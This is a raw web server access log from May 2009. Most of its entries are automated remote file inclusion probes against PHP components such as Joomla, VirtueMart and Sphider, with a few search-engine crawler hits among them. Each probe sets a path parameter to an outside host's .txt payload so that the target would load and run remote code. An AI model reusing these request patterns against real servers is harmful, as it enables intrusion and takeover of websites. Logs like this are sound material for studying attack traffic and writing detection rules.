119.63.193.56 - - [29/May/2009:22:33:39 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
41.250.251.52 - - [29/May/2009:22:34:38 -0500] "GET /logs//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
41.250.251.52 - - [29/May/2009:22:34:43 -0500] "GET //administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
65.98.80.2 - - [29/May/2009:22:35:50 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:35:50 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:35:50 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:36:30 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:36:30 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:36:30 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:37:09 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:37:09 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:37:09 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.15.14.89 - - [29/May/2009:22:42:50 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
67.15.14.89 - - [29/May/2009:22:42:50 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
81.92.97.90 - - [29/May/2009:22:47:35 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
81.92.97.90 - - [29/May/2009:22:47:35 -0500] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
81.92.97.90 - - [29/May/2009:22:47:41 -0500] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:22:51:36 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:22:51:36 -0500] "GET /logs/access_log.1242518400//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:22:51:36 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:22:52:01 -0500] "GET /logs/access_log.1242259200//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
85.10.128.219 - - [29/May/2009:22:55:41 -0500] "GET /logs//modules/xoopsgallery//init_basic.php?GALLERY_BASEDIR=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.10.128.219 - - [29/May/2009:22:55:41 -0500] "GET /logs/access_log.1239667200//modules/xoopsgallery//init_basic.php?GALLERY_BASEDIR=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
85.10.128.219 - - [29/May/2009:22:55:41 -0500] "GET //modules/xoopsgallery//init_basic.php?GALLERY_BASEDIR=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.198.53.173 - - [29/May/2009:22:56:27 -0500] "GET /logs//components/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
213.198.53.173 - - [29/May/2009:22:56:27 -0500] "GET //components/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
80.237.146.58 - - [29/May/2009:22:58:38 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:22:58:38 -0500] "GET /logs/access_log.1238803200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:22:58:38 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:22:58:43 -0500] "GET /logs/access_log.1241654400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
81.92.97.90 - - [29/May/2009:22:58:53 -0500] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
81.92.97.90 - - [29/May/2009:22:58:53 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:58:54 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:58:54 -0500] "GET /logs/access_log.1242000000//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:58:54 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
81.92.97.90 - - [29/May/2009:22:58:59 -0500] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
218.104.188.3 - - [29/May/2009:22:59:09 -0500] "GET /logs//contenido/backend_search.php?contenido_path=http://www.hohewart.de/milw0rm-fukung.txt%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
218.104.188.3 - - [29/May/2009:22:59:09 -0500] "GET //contenido/backend_search.php?contenido_path=http://www.hohewart.de/milw0rm-fukung.txt%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
65.98.80.2 - - [29/May/2009:22:59:30 -0500] "GET /logs/access_log.1242518400//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:59:57 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:59:58 -0500] "GET /logs/access_log.1242000000//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:22:59:58 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:23:00:18 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:23:00:18 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:23:00:18 -0500] "GET /logs/access_log.1242000000//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:23:00:28 -0500] "GET /logs/access_log.1242518400//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:00:35 -0500] "GET /logs/access_log.1242518400//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:00:45 -0500] "GET /logs/access_log.1242000000//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:00:45 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:00:45 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:01:17 -0500] "GET /logs/access_log.1242518400//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
200.142.148.142 - - [29/May/2009:23:02:02 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.142.148.142 - - [29/May/2009:23:02:02 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.142.148.142 - - [29/May/2009:23:02:07 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
84.32.195.2 - - [29/May/2009:23:02:29 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
84.32.195.2 - - [29/May/2009:23:02:29 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.32.195.2 - - [29/May/2009:23:02:29 -0500] "GET /logs/access_log.1238803200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
84.32.195.2 - - [29/May/2009:23:02:30 -0500] "GET /logs/access_log.1241654400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:23:05:18 -0500] "GET /logs/access_log.1242518400//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:23:05:18 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:23:05:18 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.120.237.150 - - [29/May/2009:23:05:39 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 191354 "-""libwww-perl/5.811"
216.120.237.150 - - [29/May/2009:23:05:39 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
218.185.20.88 - - [29/May/2009:23:05:42 -0500] "GET /logs/access_log.1242259200//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
87.118.90.151 - - [29/May/2009:23:06:30 -0500] "GET /logs//sphider/search.php?include_dir=http://a22.altervista.org/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
87.118.90.151 - - [29/May/2009:23:06:31 -0500] "GET //sphider/search.php?include_dir=http://a22.altervista.org/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
65.55.106.180 - - [29/May/2009:23:07:08 -0500] "GET /logs/access_log.1174953600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.118.90.151 - - [29/May/2009:23:07:40 -0500] "GET /logs//sphider/search.php?include_dir=http://a22.altervista.org/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
87.118.90.151 - - [29/May/2009:23:07:40 -0500] "GET //sphider/search.php?include_dir=http://a22.altervista.org/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
216.221.10.116 - - [29/May/2009:23:08:05 -0500] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:23:08:05 -0500] "GET /logs/access_log.1239235200//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:23:08:05 -0500] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:23:08:08 -0500] "GET /logs/access_log.1240099200//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:09:37 -0500] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:09:37 -0500] "GET /logs/access_log.1239235200//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:09:37 -0500] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:09:37 -0500] "GET /logs/access_log.1240099200//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
87.106.135.14 - - [29/May/2009:23:09:40 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
87.106.135.14 - - [29/May/2009:23:09:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
87.106.135.14 - - [29/May/2009:23:09:41 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:16 -0500] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:16 -0500] "GET /logs/access_log.1239235200//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:16 -0500] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:18 -0500] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:21 -0500] "GET /logs/access_log.1239235200//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:21 -0500] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:22 -0500] "GET /logs/access_log.1240099200//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:29 -0500] "GET /logs/access_log.1240099200//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:31 -0500] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:31 -0500] "GET /logs/access_log.1236643200//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:32 -0500] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:10:32 -0500] "GET /logs/access_log.1235260800//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.106.135.14 - - [29/May/2009:23:11:08 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:23:11:12 -0500] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:23:11:12 -0500] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:23:11:12 -0500] "GET /logs/access_log.1236643200//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:23:11:16 -0500] "GET /logs/access_log.1235260800//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
82.195.248.50 - - [29/May/2009:23:11:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
82.195.248.50 - - [29/May/2009:23:11:43 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
82.195.248.50 - - [29/May/2009:23:11:43 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:11:48 -0500] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:11:48 -0500] "GET /logs/access_log.1236643200//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:11:48 -0500] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:11:53 -0500] "GET /logs/access_log.1235260800//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
80.93.54.56 - - [29/May/2009:23:12:36 -0500] "GET /logs//sphider/search.php?include_dir=http://a22.altervista.org/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
80.93.54.56 - - [29/May/2009:23:12:37 -0500] "GET //sphider/search.php?include_dir=http://a22.altervista.org/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
65.98.80.2 - - [29/May/2009:23:12:38 -0500] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:12:38 -0500] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:12:38 -0500] "GET /logs/access_log.1236643200//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
82.195.248.50 - - [29/May/2009:23:12:39 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:23:12:49 -0500] "GET /logs/access_log.1235260800//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
80.93.54.56 - - [29/May/2009:23:13:12 -0500] "GET /logs//sphider/search.php?include_dir=http://a22.altervista.org/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
80.93.54.56 - - [29/May/2009:23:13:13 -0500] "GET //sphider/search.php?include_dir=http://a22.altervista.org/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
209.25.133.199 - - [29/May/2009:23:13:30 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
209.25.133.199 - - [29/May/2009:23:13:30 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
69.16.193.132 - - [29/May/2009:23:14:59 -0500] "GET /config.php?path_to_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.16.193.132 - - [29/May/2009:23:14:59 -0500] "GET /logs/access_log.1238889600/config.php?path_to_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.16.193.132 - - [29/May/2009:23:14:59 -0500] "GET /logs/config.php?path_to_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.212.14.88 - - [29/May/2009:23:19:17 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://myfiberhub.com/media/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
67.212.14.88 - - [29/May/2009:23:19:18 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://myfiberhub.com/media/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
65.55.106.146 - - [29/May/2009:23:20:38 -0500] "GET /logs/access_log.1162944000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
84.54.137.9 - - [29/May/2009:23:21:11 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://myfiberhub.com/media/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
84.54.137.9 - - [29/May/2009:23:21:12 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://myfiberhub.com/media/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
213.228.158.38 - - [29/May/2009:23:22:25 -0500] "GET /logs/index.php?visualizar=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
213.228.158.38 - - [29/May/2009:23:22:26 -0500] "GET /index.php?visualizar=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
88.191.103.144 - - [29/May/2009:23:22:52 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://myfiberhub.com/media/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
88.191.103.144 - - [29/May/2009:23:22:52 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://myfiberhub.com/media/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
